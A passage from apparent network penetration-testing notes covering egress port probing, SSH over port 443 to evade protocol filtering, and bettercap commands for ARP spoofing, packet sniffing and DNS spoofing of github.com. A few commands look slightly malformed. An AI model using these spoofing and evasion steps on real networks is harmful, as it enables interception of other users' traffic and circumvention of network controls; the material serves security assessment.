Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise in the air. He’s invisible.
Convert pcapng to pcap
tshark -F pcap -r NTLMv2.pcapng -w NTLMv2.pcap
Open outbound ports / Filtering
Web content filtering
For example, try to connect to 4chan or exploit-db with CLI but also with a browser
Living Off Trusted Sites
Try to access some of LOTS
Port Filtering
Test for other ports: 22, 21, 23, etc.
$ports = @(20, 21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 8080)
$hostname = "portquiz.net"
foreach ($port in $ports) {
$result = Test-NetConnection -ComputerName $hostname -Port $port -InformationLevel Detailed
if ($result.TcpTestSucceeded) {
Write-Output "Port $port is open on $hostname"
}
}
Protocol Filtering
For example, if port 22 is blocked, also test for protocol filtering: SSH on port 443 ?
Server side:
sudo nano /etc/ssh/sshd_config
# Add or change port
Port 443
# Restart SSH
sudo systemctl restart ssh
# or
sudo service ssh restart
# If nesserary open port 443
sudo ufw allow 443/tcp
Try to connect over port 443
ssh -p 443 username@server_ip
The Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)
# Host discovery
net.probe on
# See all host
net.show
# ARP spoof
set arp.spoof.targets 192.168.37.133
arp.spoof on
# Spoof the entire subnet /!\ not recommended
set arp.spoof targets
# By default only connections to and from the external network will be spoofed
# Spoof internal connection
set arp.spoof.internal
# Capture data
net.sniff on
# Save the captured packet to pcap
set net.sniff.output filename.pcap
# DNS spoofing
set dns.spoof.domains github.com
dns.spoof.on
